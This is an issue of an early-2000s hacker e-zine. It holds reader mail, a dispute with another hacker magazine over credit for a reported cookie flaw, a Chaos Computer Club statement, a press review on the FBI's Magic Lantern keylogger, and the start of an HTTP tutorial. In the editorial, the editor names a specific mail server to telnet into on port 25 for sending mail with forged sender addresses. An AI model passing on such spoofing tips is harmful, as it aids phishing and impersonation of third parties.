Land Of The Free #3
by Sirius Black
Summary
- Editorial
- Magic Lantern, the FBI virus
- telnet and http
- Everything about the Chaos Computer Club Hamburg
- Cryptography file: part 1
- The caramail hack
- Articles from OS4M4CKERS
- Lyrics
- Conclusion
Editorial
Welcome to you for a new issue of Land Of The Free!!! If you are a faithful reader you have surely realized that the colors used for the mag do not change; indeed after the first number I found that they were not so bad so I keep them. At the time I write these lines (shit where is my watch?... It's Saturday April 6, 2002 at 9:55 p.m.) the summary of the mag is uncertain: articles will surely be added and the main subject is not not yet ready... but hey, it will come, a matter of time. I'm always looking for more ways to distribute my zine so if you have a site that talks about hacking/cracking... you can offer it on your site (or you make a link it's all stupid and no need to download then upload ). What's new ? Well you must have noticed the mail section in the menu. Well yes, you have to believe that LOTFREE is not badly appreciated.
Editorial 2: well yes, here is an editorial that will stick better to the mag because done before the conclusion, once everything is written. The http part (especially the POST method) will be studied in detail in issue 4. Otherwise OS4M4CKERS wrote me 3 small articles but not the least so a big thank you to him. Especially on file sharing passwords (Hack netbios), it's brand new so read it!!!!
Attached files: crypto is an encryption/decryption program (logic), color is a preview of what's to come for LOTFREE#4, the rest, articles, sources and images... Enjoy!!
Well, let's start with the first email I received (I don't know who sent it to me, I deleted the email after copying it):
Hi, I find your zine great because it's detailed and it's not made of "spoof" like some....
I'm looking for smtp servers that don't check the shipping address (to send messages
like "moi@jhdfjdhjsfdhfjkshfjhsdjk.com"), I tried to look for them on the engines but I couldn't find them. So
if you can help me out, thank you.
Good luck
@+
Ah!! So this one made me happy!!! I couldn't answer for the mail server the first time but later I sent him another mail with therefore an smtp server (it will be useful to everyone like that). The server in question is mail.club-internet.fr, this is the address to enter in the telnet and the port c is always 25. But beware the server is far from being talkative (just OK when it works I think ). And in addition he only wants "standard" addresses (if you put satan as sender he won't accept satan@enfer.com however he accepts).
Another email told me that the mag was too short, Arf... It's probably because it's cool to read :-)
Otherwise you remember in LOTFREE#2, in the article "Recovering documents on a PC", I told you about an online brokerage company that did not encrypt its cookies. I didn't mention his name (so as not to harm him) but it was about boursorama. Well, a few weeks later, I bought HZV and what did I see on the front page? "A big flaw in Boursorama". I can tell you that it made me weird at the time, like a big doubt and then finally it was what I had noticed but being a newbie I hadn't really paid any attention to it. Anyway, there I said to myself: either it's a coincidence (possible) or they cheated on me. So I sent them an email and I
Here is the email I sent to Fozzy (the author of the Hackerz Voice article):
To:fozzy@dmpfrance.com
from:lotfree@multimania.com
Dear Fozzy
Where to start... Here, I have just read HZV9, I had moreover been surprised by the announcement of a fault in boursorama. Especially since two weeks ago (a little more in fact) I had, in number two of my mag (LOTFREE#2), already mentioned the fact that a certain online brokerage company did not encrypt its cookies (however without mention that it was about boursorama) of course it can be a coincidence but in case the idea would have come to you while reading my mag I would have preferred you to wink at it.
In short let's talk about something else, since we are in the series of remarks I find that your mag (although it must be admitted) takes on a certain tone (from the first lines we see the word elite). I've always thought that a self-proclaimed elite person is nothing more than a lamer, much like the Kimble you praise who calls himself "king of hackers" when he is a crook who only profited from the events of September 11. Of course I admit that he must have a lot of knowledge in hacking but he must have forgotten to read some texts from The Mentor. In short, you adore a person who has nothing of a hero and who has only done
Otherwise a few compliments (phew !!): I love what you do and I loved your article on defacing by php (really very good), at the end you refer to the madchat hack that was done by wizeman and another guy. Do you know where I can find this zine? I only have a text version and the result is a lot of things skipped over (without the images, it's not easy).
Well, I think I said it all. Answer me quickly for boursorama story that I sleep soundly (when you're a newbie, if you get an idea to see it later in a newspaper it's quite disgusting).
My website: multimania.com/lotfree
Otherwise as I am not resentful here is an article on REAL hackers: the CCC of Hamburg (not the ccf with this ****** of Condat). Go @+. SiriusBlack.
CCC condemns attacks on communication systems
MORE INTERNATIONAL UNDERSTANDING THAN EVER
In reaction to the incredible murders committed in the USA, there is currently circulating within the hacker scene a call to destroy websites, and other Internet-related communication systems, in Islamic countries or employed by Islamist organizations.
The Chaos Computer Club strongly condemns this appeal and asks everyone to ignore this appeal like any other similar appeal. Being a galactic union of hackers, we simply cannot imagine in the current situation dividing the world into good and bad and using - as the only reason - religion as a criterion for such segregation.
Understanding recent events is a real challenge for anyone living on this planet and in the global village. Being hackers, however, we must try to do the necessary world processing in the minds of humanity. “We face this power of destruction and we feel abandoned. However, we believe in the power of communication, a power which has always had the last word, and which is a force far more positive than hatred,” said Jens Ohlig, spokesperson for the CCC.
"electronic communication infrastructures like the Internet are now needed to contribute to an international understanding of a situation like this, which is understandably tense!, and it is simply not acceptable to want to cut lines of communication and thus reinforce the bases of ignorance," added Andy Müller-Maguhn, spokesperson for the CCC.
The Chaos Computer Club, which is celebrating its 20th anniversary, claims in its principles freedom of information and communication at least worldwide, and without hindrance, as a human right.
In 1999, the CCC joined forces with an international coalition of hacker groups (Cult of the Dead Cow, 2600, L0pht, Phrack, Pulhas, Toxyn, !Hispahack and several members of the Dutch hacker community) to strongly condemn the use of networks as [battlegrounds, not livestock]: “do not participate in any act [of] ‘cyber warfare’. Keep communication networks alive. They are the nervous system for the progress of mankind. ".
Chaos Computer Club
09/13/2001
Well here is the email I sent him, you also notice the article on the CCC which I made a file for this number. That said I could also have told them that the article on Kimble they had to pump it on Zataz Magazine but hey who doesn't pump on Zataz? Well here is Fozzy's answer (who answered very quickly by the way):
From: FozZy <FozZy@dmpfrance.com>
Subject: Re: hzv
To: Sirius Black<lotfree@multimania.com>
Hi,
Thank you for your remarks.
I always cite my sources. In this case, I would have obviously quoted your mag, but in addition I would have contacted you to find out if you wanted to write the article yourself or part of it. If that can reassure you, Boursorama having corrected (very badly) this problem since the end of February, if your magazine appeared after this date, it is the proof that I did not "pump" on you... Else hand, look at this link: this is a guy who posted this AFTER us, on bugtraq, apparently in good faith: http://online.securityfocus.com/archive/1/265250
and I have a buddy who m said he noticed it too, because he uses boursorama, but he didn't
So you see, we are not the only ones...
If you find faults of this kind, or others, if you want I could help you to publish them on the internet (bugtraq) and in hzv, citing your e-zine, and clearly stating that you are the discoverer of the flaw.
If you want to write articles for hzv, since you think it can be improved (which is true!), why not too, but they have to be good. (of course ;)
Concerning kimble and the ccf... I tend to agree with the ccf. but beware, it seems that kimble's original idea has been hijacked and has degenerated without him being able to reframe things.
So...
a+
FozZy
I can tell you that it reassured me. Of course he could have lied to me but I read a lot of HZV and I know that Fozzy understood the notion of community among Hackers so I trust him. It's not something we often talk about, the notion of the hacking community, but it just consists of sharing your knowledge and above all respecting the originals (always leave the name of the guy who writes the article, leave it as it is). Of course we can add comments... Those who make me laugh are those who leave the name but who don't say where it comes from. That is to say that the guy makes believe that for example, Mitnick wanted to write in their magazine... LoL
Magic Lantern: The FBI Virus
This is a very serious thing that few people are aware of. I did a lot of research on it and then after a while I came across a small press review, the authors are of course marked and I added some articles taken elsewhere. As it took too much space, it is in a separate file which is here.
Soon the FBI will be able to break into your computerOrwell was right. Soon, the FBI will be able to penetrate — with complete impunity — the privacy of your computer to consult everything it contains... remotely and without leaving a trace.
The virus/worm — code name: Magic Lantern — is based on a surveillance technique called keylogging. It detects each key typed by the user. Its operator records the sequence of any password and thus decrypts any encoding intended to scramble a message.
The spyware uses the Internet to break into a suspect's machine and return passwords, text and email addresses (even unsent ones) and the history of sites visited. Moreover, it appropriates any document from the hard drive, even those that have been deleted. In short, a search in order.
The technique is not revolutionary in itself since particularly perverse hackers - thanks to viruses like Back Orifice and SubSeven - have already used the web to take control of PC computers.
Sensitive agencies such as the Valcartier Research and Development Center (CRDV) operate in a vacuum, using different computers for sensitive information, which are not connected to the Web. This is the first time that the police have decided to use such means, with the blessing of the American government.
Magic Lantern goes even further than the controversial Carnivore. The latter is installed at the Internet service provider to spy on a user. Among IT experts, the most fatalistic point out that, from this perspective, Magic Lantern logically embodies the next step.
To use the analogy of David Corn, the Washington-based editor of The Nation, Carnivore is like an ambush cop watching speeders, whereas with Magic Lantern, that same cop sits in the back of a suspect, without the latter suspecting his presence, to accompany him on his travels.
The metaphor illustrates another disturbing fact: if the Internet is a public space, without any real regulation, it is otherwise with a personal computer. Moreover, cyberspace has no borders. In other words, the FBI can "visit" your Mac or PC, without asking the Canadian Security Intelligence Service (CSIS) for help, much less its permission...
The confession by the American secret services, on December 12, went largely unnoticed. An FBI spokesperson then clarified that the project was still in development. Similar software has, however, already been used in criminal investigations, but the recording device was manually implanted in the computer, thanks to a search warrant obtained beforehand from a judge. Information transmission software requires an electronic surveillance warrant. This is precisely where the shoe pinches, because of the new anti-terrorism laws adopted in the wake of the events of September 11.
It is a real "intrusion into private life, which is not subject to parliamentary or judicial control to allow citizens to defend themselves", worries Jacques Tousignant, vice-president of the League of Rights and Freedoms ( see other text on page A 5).
How to guard against such an abusive intrusion if you have nothing to reproach yourself for? For the moment, impossible. Worse still, the break-in might leave no trace. Some companies that develop antivirus like Symantec have announced that they could arrange for it to be undetectable, by Norton in this specific case. The anger of the cyberconnected reverberated in shock waves in the discussion groups.
Conversely, at least one company, Sophos, has made it a matter of principle, alleging that non-American Internet users will seek protection from such a surveillance system.
But even more, stressed a spokesperson, what if other intelligence services create such a tool, should we also ignore them?
Following him, we can assume that if the United States succeeds, why not “enemy” countries! And what will happen if the Magic Lantern ever falls into the hands of a criminal or terrorist organization...
Source: The Sun (01/12/2002)
When the FBI worries companies
A new electronic spy tool, nicknamed "Magic Lantern", has been discovered. Has the FBI just taken a decisive step in what is considered by some to be essential in the fight against terrorism but felt by others to be a worrying attack on individual freedoms and free competition?
After the big ears of the Echelon network, set up by the NSA on a global level, then the Carnivore system allowing the FBI to monitor Internet communications on American territory, the Federal Bureau was forced to recognize the existence of a new electronic spy nicknamed "Magic Lantern".
Technically, "Magic Lantern" is a marvel of technology. A virus from the Trojan horse family and keylogger species, it uses email to install itself on a computer.
Then, it monitors and stores in memory the letters or numbers typed on the keyboard by the user of the machine. In the end, the snitch discreetly extracts the information it has collected.
Used by computer hackers or for economic espionage, this type of software was developed by the FBI to facilitate the work of investigators wishing to decipher documents whose encryption is too difficult to break.
"Magic Lantern" allows them to intercept passwords and keys used to encrypt messages.
Those of the bandits, specifies of course the FBI, which also affirms that the magic snitch is not yet deployed and that “there is no question of using it outside the legal framework”.
But the weapon is double-edged. For Daniel Martin, former commissioner of French counterintelligence and expert in cybercrime, this tool strangely resembles those used in espionage cases.
"The Americans would set a serious precedent by using 'Magic Lantern'. This software would open thousands of loopholes in the networks.
These flaws could be used by anyone and for anything, including economic espionage,” he said.
An electronic "snitch"
Worrying, dangerous, uncontrollable... Computer security professionals do not have enough negative terms to qualify the new electronic cookie.
Antivirus developers were the first to react. Faced with the initiative of the FBI, they would find themselves obliged to conceal from their clients the possible presence of “Magic Lantern” in their company's networks.
Embarrassed speeches for the leaders of Symantec and McAfee, the two biggest American antivirus developers, torn as they are between the necessary protection of their markets and a logic of strong interests with the American government.
For the company Sophos, another player in the antiviral protection of companies, there is on the other hand no ambiguity: "If we find a Trojan horse, we develop the means to make it ineffective, whether it is developed by the FBI or not. »
Serge Kerbrat, France Director of Internet Security System (ISS), a major American player in Internet security, does not plan to hide the presence of “Magic Lantern” in their information systems from customers.
"It would be to put down all the awareness work on network security that we have implemented with companies for years," he argues.
As for Thierry Karsenti, Technical Director Europe of Check Point, expert in security on the Internet, the danger comes mainly from the risk of diversion. “Inevitably, pirates will discover the mysteries of “Magic Lantern”.
If antivirus developers agree not to detect it, they take the major risk of allowing other, malicious people to use its resources. »
Source: France-America (02/01/2002)
The FBI's small arrangements with hackers
"At the cellars, it's what we call a case of conscience" explains in essence an article from Dailyrotten.
Explanation: Recently, virus writers released one of the most dangerous worms in the history of modern e-mail, the sinister Badtrans.
In addition to epistolary saturation and the traditional weapons of any self-respecting virus, Badtrans incorporates a keyboard input capture mechanism (kdll.dll). And not a simple buffer pump, a real cop capable of only being interested in the “log”, “password” etc. entries of each contaminated station.
Once the harvest is complete, the capture routine then sends the fruit of its labor to a few more or less anonymous e-mail addresses… aliases quickly rendered unusable by the ISPs in charge of hosting them.
Among the hosts concerned are Excite, Yahoo, and IjustGotFired… service providers then finding themselves, reluctantly, custodians of an impressive sum of passwords and various credentials. The story could end there.
But now the FBI, rather than looking for the original owners of the mailboxes in question, asks interested parties for "a duplicate of the lists collected"... in short, a right of access to nearly 2 million machines, both private and professional. .
After all, why spend a thousand and a hundred to develop a "Magic Lantern" when pirates do it very well, and for free too!
IjustGotFired, torn between the obligation to obey the high authorities of the State and the duty of honesty vis-à-vis the victims of Badtrans, chose a completely Jesuitical middle way: a search tool (consultable by all, including FBI agents) discreetly indicating whether the applicant has been "logged in" or not. We are still looking for an equivalent of this page within Yahoo services.
Source: Networks & Telecoms (28/12/2001)
Hackers and the FBI
No you're not dreaming, the Cult of the Dead Cow has just announced that it was going to give the FBI a helping hand in the manufacture of its magic lantern, a tool which should make it possible to spy on a "criminal" from a distance. Basically a digital Trojan horse. Reid Fleming, a member of the cDc explained this: "Never before has the United States faced such dangerous enemies. To counter this challenge, the FBI has announced its software. We will help them in our own way (...) we are US citizens and would be remiss if we did not offer our expertise in this area." As a reminder, the cDc is the author of the Back Orifice and Bo2 software.
Source : Zataz (12/15/2001)
The FBI confirms the existence of its spyware
The FBI confirmed on Wednesday, December 12 the existence of its computer Trojan horse project, answering to the code name of "Magic Lantern", allowing to spy on Internet users without their knowledge under the influence of a judicial investigation.
“This is an established project” but which has not yet been deployed, Paul Bresson, spokesman for the federal agency, told Reuters. But "we cannot discuss this project because it is still under development", indicates the manager without further details.
This news was first revealed on Tuesday, November 20 by the American news site MSNBC and has since been widely criticized in the American press for its implications for the presumption of innocence and individual freedoms.
Asked whether the use of this "Trojan" virus will be subject to obtaining a particular warrant, Bresson answers without further details that "like all technological projects and tools already deployed by the FBI, it will be used in accordance with the appropriate legal procedures".
According to MSNBC, "Magic Lantern" is a "key logger" type program, a Trojan horse sent via the Internet that invisibly attaches itself to a system. It then saves everything that the user enters on his keyboard, in order to recover his data or his passwords.
Confusing position of antivirus vendors
Antivirus software publishers, for their part, do not yet have a clear position on the subject. Are they going to play the FBI game and make sure their software doesn't block the snitch or not?
Before the federal agency confirmed the project, statements were confusing to say the least. On November 27, Eric Chien, head of research at Symantec (Norton Antivirus) told the British online daily The Register that, since only the FBI would use Magic Lantern, it would not update its products to detect the virus. Network Associates (McAfee) made a similar statement the same day in an Associated Press dispatch. Critics have of course poured in on the net and in the press.
To put on a good face, on December 11 officials from Symantec, Network Associates, Trend Micro and Sophos told Reuters they had “no intention of modifying their products to satisfy the FBI”.
Contacted by ZDNet France, a spokesperson for Network Associates told us by email on Wednesday December 12 that his company "did not speak to the FBI about this virus" and that "the FBI has not confirmed what we believe to be a rumor at this time". For its part, Symantec France was unable to answer our questions. The debate remains open...
Source: ZDNet (12/14/2001)
The FBI confirms the existence of the Magic Lantern spy project
This Wednesday, the FBI acknowledged working on a system that would allow the remote implementation of a PC surveillance system.
An FBI spokesperson confirmed on Wednesday that the US government is working on controversial spy technology codenamed Magic Lantern. The latter could be used to break into the computers of suspected criminals.
"We don't want to talk about it right now because it's still in the planning stage. Nothing has been deployed," the FBI spokesman said.
The federal office had already, in the past, acknowledged using software to record keystrokes made on a keyboard, to obtain the passwords used in particular in the sending of encrypted messages. Only problem: this system requires a physical installation in the PC.
On the other hand, Magic Lantern would allow the FBI to infiltrate a PC thanks to viruses, of the Trojan horse type, sent by e-mail. The recording of the entries made and the retrieval of the data would then be done remotely.
Civil liberties associations are concerned about the FBI's overzealous use of such a system. The FBI spokesperson replied that, like any listening system, it could not be used without first obtaining the necessary authorizations.
Antivirus vendors have, for their part, declared that they would not cooperate spontaneously with the FBI and that they would continue to develop software that detects all types of viruses, regardless of their origin. But the government could, in the name of national security, solicit them.
The FBI has also recently appealed to access providers to implement the email listening system, Carnivore, in their network.
Source: 01 Net (13/12/2001)
FBI: faint light on magic lantern In the United States, the FBI publicly acknowledged, Wednesday December 12, that it developed "Magic Lantern", a spyware which will allow the American services to read the encrypted mails in any discretion.
It´s official, an FBI spokesperson acknowledged it yesterday, Wednesday December 12: the development of Magic Lantern is underway. This software, whose existence was revealed for the first time by the Internet channel MSNBC in November, belongs to the category of "keyloggers". Installed on a microcomputer, the keylogger monitors and stores the keys typed on the keyboard by the user. When someone encrypts their communications with software that is too hard to break, it is much easier to discover their password or the content of their messages by recovering the data from the keylogger.
A spy on horseback in cyberspace
The secret services already have recourse to this type of application. Classic pattern: the housekeeper who comes to clean the offices of a company in the evening, puts a floppy disk in the computer, which installs the application. The next day, she comes to retrieve the data by the same process. With Magic Lantern, the novelty - although in this field, one is never sure that it is new -, it is the possibility of installing the keylogger in any discretion via Internet. Indeed, the spy arrives mounted on a "Trojan horse". The latter is software that allows you to take control of a remote computer,
Search warrant, or eavesdropping?
For several weeks, the libertarians and the militants of the Internet are moved by the project of the FBI. They wonder, in particular, about the possibility of carrying out these surveillances, equivalent to listening processes, without a judicial warrant. When an investigator has such a tool, he is inevitably tempted to use it "savagely" to discreetly penetrate a suspect's computer. "Not seen, not caught", why wait to obtain a warrant to verify your assumptions? The FBI spokesperson, quoted by Wired, remains vague on the type of warrant that would be required for what does not appear to everyone to be a search: "
The risk of industrial complicity
Other clues suggest that eavesdropping is likely to occur. Some access providers had voluntarily complied with the installation of "Carnivore" equipment, named after the spy system developed by the Americans to monitor the communications of Internet users. This while a prior legal mandate is theoretically necessary for its implementation. Currently, the FBI is pressuring telecommunications companies to "upgrade" their networks so that eavesdropping on digital conversations is easier. The Washington Post reported in November that anti-virus vendor McAfee had made sure, with the federal administration, because its software could not "by chance" detect Magic Lantern. The company immediately denied, soon imitated by its competitors. But the doubt persists...
Source: Transfer (13/12/2001)
The FBI's "Magic Lantern"
Last August, we told you about Nicodemo Scarfo Jr., accused by the United States Federal Police (FBI) of loan sharking and illegal gambling activities. The FBI's evidence relied primarily on a surveillance technique called a "keylogger," a hardware or software device that records keystrokes typed on a computer keyboard. Scarfo protected all of his files and email using Pretty Good Privacy (PGP) encryption software, but with the password recovered using the keyboard spy, investigators were quick to break into his secrets.
Scarfo had asked the court to require the FBI to provide details about this surveillance device because, depending on whether it was a hardware device installed in his computer, or a software device that would have transmitted information through the Internet, the situation presented itself under a very different legal angle. Investigators had a search warrant. However, the installation of a physical device is acceptable under a search warrant (which also permits surreptitious intrusion); an information transmission software device requires an electronic surveillance warrant.
Judge Nicholas Politan had therefore ordered the FBI to describe how it had recovered Scarfo's password. On October 4, Randall Murch, Assistant to the FBI's Assistant Director of Technology Investigations, testified before Judge Politan by way of affidavit. He stated that the investigators had installed in Scarfo's computer, during one of five clandestine intrusions into his offices, a device for recording keystrokes typed on the keyboard. They later retrieved the device, found Scarfo's PGP password, and gained access to the incriminating documents. There had therefore been no transmission of the "surveillance product" by modem or other means of telecommunication. The honor was safe for the FBI, Scarfo's rights had not been violated.
You certainly know the Badtrans virus / worm, in addition to a code allowing it to spread, Badtrans also acts as a keyboard spy, allows to record all keystrokes for recovery and subsequent processing (passwords, names of users, bank card numbers, etc.). In the case of Badtrans, this information would be sent by e-mail to one or more addresses of the authors of the code.
On November 20, citing confidential sources, MSNBC reporter Bob Sullivan reveals that the FBI has a virus/worm that acts as a keyboard spy. Code name: "Magic Lantern", the magic lantern. It is known that since September 11, the use of the Carnivore electronic mail monitoring system has been facilitated by the adoption of anti-terrorist laws. But Carnivore has its limits. What is the point of intercepting a file if it is encrypted and the investigators do not have the encryption key. All you have to do is plant the spyware virus/worm, which can be done by email, and recover the encryption key. Sullivan, in his article,
On November 22, it is the turn of Ted Bridis of the Associated Press to evoke "Magic Lantern". But Bridis goes further: he claims that the maker of antivirus software Network Associates/McAfee has taken what could be described as a proactive approach and has communicated with the FBI to ensure that its software does not intercept "Magic Lantern" and thus put the chip in the ear of the surveillance target. In fact, because it's a virus/worm, the FBI's spy code could well get tangled up in the web of software designed to protect our systems.
The case is beginning to gain momentum both in technical circles and among privacy rights advocates. So much so that on Nov. 26, Marisa Lewis of McAfee's investor relations department denied that the company had contacted the FBI. In a statement emailed to some reporters, including Declan McCullagh of the Wired news service, Lewis denies contact, says he doesn't expect the FBI to contact McAfee, denies speculation about "Magic Lantern" whose existence is not acknowledged by the FBI, and represents that the company complies, and will continue to comply, with applicable laws.
Bridis persists and signs. He says he got his information from an unnamed senior executive at McAfee, and attributes McAfee's denial to the outcry over his article. He adds that McAfee does not say that it will not cooperate with the FBI if the latter so requests.
On November 27, the British newspaper The Register follows the case and quotes, this time, a spokesperson from Symantec, manufacturer of the Norton antivirus. According to Eric Chien, principal researcher at Symantec, if the FBI used an e-mailed keyboard spy, and he was the only one using it, Symantec would arrange for it to be undetectable by Norton antivirus.
Graham Cluley, a senior adviser at another antivirus manufacturer, Sophos, objects to the voluntary opening of gateways to surveillance viruses/worms, alleging that network users outside the United States would be entitled to expect protection from surveillance tools like "Magic Lantern". To submit Cluley: "What will happen if the French or Greek intelligence services create such a surveillance tool? Should we also ignore them?"
Source: Chronicles of Cyberia (04/12/2001)
The FBI has a cybercrime department
In full internal reorganization, the FBI (Federal Bureau of Investigations) announced Monday, December 3 that it will set up a department solely dedicated to the fight against cybercrime. He will be responsible for dealing with all cases relating to intellectual property violations, and crimes in high technologies and IT.
The FBI wants to consolidate the efforts of its troops so that there is no duplication in investigations. This is the reason why it will now be made up of four departments, against 11 previously, reports its spokesperson, Deborah Weierman. The three other departments created will be devoted respectively to anti-terrorism and counter-espionage, to the maintenance of order, and to the administrative part.
The cybercrime department will merge with the criminal investigations department, under the direction of Ruben Garcia Jr, to become a single entity. It is not yet known whether the National Infrastructure Protection Center (NIPC), the infrastructure protection center, will be integrated into the new structure. The activities of this branch of the FBI, which investigates cybercrime and, among other things, viruses, depend on both the department in charge of criminal investigations and that dedicated to anti-terrorism and counter-espionage.
Source: ZDNet (04/12/2001)
Thanks to its "magic lantern", the FBI hunts down terrorists and mafiosos on the Internet
How to intercept and decrypt messages sent via the Internet by terrorists and criminals? This question, the American intelligence services and the federal police (FBI) have been asking for years. The FBI may have found the answer with Magic Lantern, a computer virus introduced to suspects' computers that would recover passwords and keys for encryption programs.
The existence of this "Trojan horse" program was revealed by the MSNBC television channel. It installs without being identified on a computer's hard drive, recovers passwords and keys, and then transmits them discreetly. Magic Lantern can be implanted via ordinary electronic mail or concealed in a CD-ROM. He might have already been tested. Last month, the FBI admitted, before a judge, having entered the computer of a Mafia kingpin, Nicodème Scarfo, in order to steal the keys allowing him to "protect" his e-mails from prying eyes. Magic Lantern is an element of a much larger project called "Cyber Knight" ("cyber-knight") aimed at providing the FBI with the means to monitor communications networks and protect the country's sensitive infrastructure (air control, electricity, telephone, supply networks of water). The FBI stresses "that encryption poses insurmountable problems to forensic activities when it is used to transmit terrorist or criminal action plans". The massive and free distribution on the Web of ever more powerful encryption tools, such as PGP (Pretty Good Privacy), has made the task of intelligence services almost impossible. ) aimed at providing the FBI with the means to monitor communications networks and protect the country's sensitive infrastructure (air traffic control, electricity, telephone and water supply networks). The FBI stresses "that encryption poses insurmountable problems to forensic activities when it is used to transmit terrorist or criminal action plans". The massive and free distribution on the Web of ever more powerful encryption tools, such as PGP (Pretty Good Privacy), has made the task of intelligence services almost impossible. ) aimed at providing the FBI with the means to monitor communications networks and protect the country's sensitive infrastructure (air traffic control, electricity, telephone and water supply networks). The FBI stresses "that encryption poses insurmountable problems to forensic activities when it is used to transmit terrorist or criminal action plans". The massive and free distribution on the Web of ever more powerful encryption tools, such as PGP (Pretty Good Privacy), has made the task of intelligence services almost impossible.
Even the NSA (National Security Agency) breaks its teeth there. This rather mysterious agency, whose budget is higher than that of the CIA, has for decades had a planetary listening network called "Echelon", denounced on several occasions by the European Parliament. According to some specialists, the NSA might be able, given the power of its supercomputers, to "break" a certain number of encrypted messages, but this would take weeks or months. Osama Bin Laden's Al-Qaeda network uses the Internet. Investigators identified hundreds of English and Arabic emails sent by the hijackers. For Ron Dick,
As a result, the NSA is now authorized by the new anti-terrorism legislation to also listen to the communications of American citizens. The federal police nevertheless claims "to be concerned about respecting the constitutional rights and privacy of citizens". She adds that the use of Magic Lantern can always be challenged in court. “By whom?” ask the associations for the defense of civil rights. The use of Magic Lantern will only be revealed after the terrorists or criminals have been brought to justice. The rest of the time, the program spying on computers will go unnoticed.
Source: The World (26/11/2001)
FBI virus
The FBI develops software capable of inserting a computer virus into a suspect's machine. This "virus" must make it possible to obtain information on the target. The software called "Magic Lantern" will allow agents to get their hands on a hacker's information. Magic Lantern would be a palliative to Carnivore, called for a few weeks DC1000, because the latter cannot deal with encrypted information. Basically the FBI is trying to make the public understand that they are going to use a sniffer directly in the hacker's machine in order to trap him. It's not really new, the FBI has already acted in this way against two Russian pirates this summer. Where we can worry is in the operation of this magic lantern. It advertises this program as a virus. Which would mean that the latter will therefore multiply. It will be communicated, for example, by e-mail, either by the FBI or by a "friend" at the request of an agent. In short, it smells of the Z series with full nose this announcement.
Source: Zataz (11/24/2001)
The FBI adopts the Trojan horse strategy
On Tuesday, November 20, the American news site MSNBC revealed that the FBI would develop a "key logger" type program, a Trojan horse, which records everything the user has typed on his keyboard, in order to recover their data and passwords. Called "Magic Lantern", it would be installed remotely on the computer of suspicious people.
A proven technique
"It looks like the FBI is just trying to find new methods of electronic surveillance," said Vincent Gullotto, director of the antivirus team at Network Associates.
The FBI opts for the Trojan horse, because it makes it possible to obtain information more quickly than with traditional decoding techniques. An idea that is not new, says Fred Cohen, security expert at the University of New Haven. This professor himself teaches authorities and security professionals the methods used by hackers to collect digital data. "In class, I explain how to use a Trojan horse to know the keys used by the user", he explains.
Hacking tools, such as the Back Orifice from the infamous Cult of the Dead Cow hacking group, and SubSeven, allow remote control of a computer after infecting it. They then know everything the person has entered, and are even able to record a conversation if a microphone is plugged into the machine. The FBI has already used surveillance software of this type in some large cases, including the Scarfo case.
The Trojan horse yes, Carnivore no
For Republican Senator Richard Armey, such methods are preferable to Carnivore, the highly controversial surveillance system used by the FBI. For Richard Diamond, Armey's spokesman, "Magic Lantern" would be "less worse", because it is only installed on one computer. On the other hand, the Carnivore system, renamed DCS 1000, gives access to an entire network, which makes it possible to spy on all the traffic it carries.
But there remains a risk, because no law clearly regulates these processes which could be used without authorization by the authorities, indicates David Sobel, general adviser of the Electronic Privacy Information Center (EPIC), an independent study group based in Washington DC " The question is more complex than for wiretapping, because the telecom operator here is not in the loop, "he says. Indeed, in the case of tapping, the authorities must present an authorization to the operator to connect to its network and spy on the line. Similarly, to install Carnivore, the help of the Internet service provider is required.
Armey successfully amended the USA Patriot Act, passed in October, to regulate the FBI's use of Carnivore. But that wouldn't apply to Magic Lantern, warns Sobel. “It is unclear what the scope of this technique is and whether it is used within reason,” he says. And to add: "It is possible that nothing can prevent its installation on a computer."
Source: ZDNet (11/22/2001)
The FBI also spies on keyboards
The use of crypto is deemed to preserve the confidentiality of messages. Except to install spyware on the computer keyboard which is used to decipher the files. The FBI will have to explain its use of such a key logger.
Judge Nicholas H. Politan finally decided to summon the FBI to explain the technique used to incriminate Nicodemo S. Scarfo, the mobster who had used PGP. The federal agents, who could not decipher the files encrypted by means of the famous encryption program, had in fact installed in his computer a key logger, a small program recording all the keys struck on a keyboard (some also take copies of screen), which had allowed them to recover the password used by Scarfo, and thus to decrypt its files. The use of crypto, and PGP in particular, is deemed to provide a level of privacy such as none "
Simple search warrant
Except that for the lawyer of Scarfo, supported by the defenders of the private life, of which the Electronic Privacy Information Center (EPIC), the installation of the key logger was illegal because concerned with a tapping of its communications. This requires a special warrant from the judge. However, the federal police did not have one and were satisfied with a simple search warrant. Privacy advocates were therefore demanding detailed explanations of the FBI's modus operandi. But so far, he said that it was national security, and that he could therefore in no way reveal the nature of the program used, at the risk of endangering the lives of certain agents (sic) . The opponents themselves, continuing to challenge the "classification" of the key logger on the grounds that it is worrying to see the police use against simple thugs techniques usually reserved for cases involving national security. The judge partially agreed with them: he will check the legality, and the classification of the process, but the lawyer will not be able to attend the hearing...
Source: Transfer (09/10/2001)
Honestly read the articles it's really a crazy thing!!!
Here is an article that I found separately but impossible to say where it comes from:
The FBI creates the Magic Lantern virus
Monday, December 17, 2001 MO
After fueling rumors for two weeks, the existence of the Magic Lantern bugging virus, developed by the FBI, has just been confirmed. The main antivirus vendors have already come out for or against its detection. Cruel dilemma: should a security professional eradicate or not an infection designed precisely for security purposes?
The most loyalists, McAfee and Symantec, have declared that they are going in the direction of the Federal Bureau and are not trying anything against a Magic Lantern. The publisher AVP is less conciliatory, and points out that we are already beginning to see viruses such as Malantern flourish. According to him, if antivirus vendors leave a flaw in their products and a hacker detects it, he will never stop exploiting it for destructive purposes.
Telnet and http (port 80)
In the continuation of my articles on Telnet, we attack port 80 which is the one that allows you to surf the Web.
Port 80 corresponds to http (Hypertext Transfer Protocol), and like any protocol, it is composed of methods, requests and responses. It was defined like all the other protocols by the W3C (the World Wide Web Consortium) whose address is www.w3.org. This organization aims to create standards for the web. Because indeed before the web there were a lot of networks and each one used a different protocol (I'm exaggerating a bit). Then one day we thought it would be good to make a standard so that all PCs could communicate with each other. This is why we created the tcp/ip protocol which is in fact a suite containing a lot of protocols.
Each protocol, syntax... is defined in a Request for Comments, these are documents that specify a standard. The complete knowledge of a protocol is thus made obligatorily by these documents. This article was greatly inspired by RFC 2616 which specifies the http standard in its version 1.1. Obviously I'm not going to put everything even if there are a lot of interesting things (the original is still 176 pages). I was also inspired by a doc on cgi especially for the MIME type examples.
Introduction
The http has been used since 1990, the first version (0.9) simply allowed to specify the transfer of raw data. It was then evolved into a much better version (1.0) which defined the MIME type: Multipurpose Internet Mail Extensions which originally allowed to know the content of an email. Now it also describes the content of a document. The most used are:
- text/html: html document
- text/plain: text file
- image/gif: I let you guess ;-)
- image/jpeg: same
- audio/x-wav: for the wave format
